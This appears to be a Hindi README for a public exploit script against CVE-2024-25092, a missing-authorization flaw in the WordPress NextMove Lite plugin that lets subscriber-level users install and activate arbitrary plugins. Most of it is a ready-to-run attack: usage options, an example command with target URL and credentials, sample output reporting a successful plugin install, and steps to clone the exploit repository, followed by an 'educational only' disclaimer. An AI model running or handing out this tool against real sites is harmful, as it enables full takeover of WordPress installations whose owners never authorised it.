
WordPress NextMove Lite प्लगइन <= 2.17.0 - Subscriber+ मनमाना प्लगइन इंस्टॉलेशन/एक्टिवेशन भेद्यता
CVE-2024-25092 एक उच्च-गंभीरता वाली भेद्यता है जो WordPress NextMove Lite प्लगइन (संस्करण <= 2.17.0) को प्रभावित करती है। यह भेद्यता एक subscriber+ उपयोगकर्ता को प्राधिकरण जाँच की कमी के कारण WordPress साइट पर मनमाने प्लगइन्स इंस्टॉल और सक्रिय करने की अनुमति देती है।
WordPress के लिए XLPlugins NextMove Lite प्लगइन में अनुपलब्ध प्राधिकरण भेद्यता है, जो subscriber-स्तर की अनुमतियों या उससे अधिक वाले प्रमाणित उपयोगकर्ताओं को मनमाने प्लगइन इंस्टॉलेशन और सक्रियण करने की अनुमति देती है। इससे WordPress साइट से पूरी तरह समझौता हो सकता है।
दिया गया Python स्क्रिप्ट WordPress साइट में लॉग इन करके और एक निर्दिष्ट प्लगइन इंस्टॉल करके इस भेद्यता के शोषण को स्वचालित करता है।
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
Password
-pl PLUGIN, --plugin PLUGIN
Plugin to install (default: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requests लाइब्रेरीरिपॉजिटरी क्लोन करें:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
आवश्यक Python पैकेज इंस्टॉल करें:
pip install requests
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से और केवल उन सिस्टम पर करें जिनके लिए आपके पास स्पष्ट अनुमति है। इस स्क्रिप्ट का अनधिकृत उपयोग अवैध और अनैतिक है।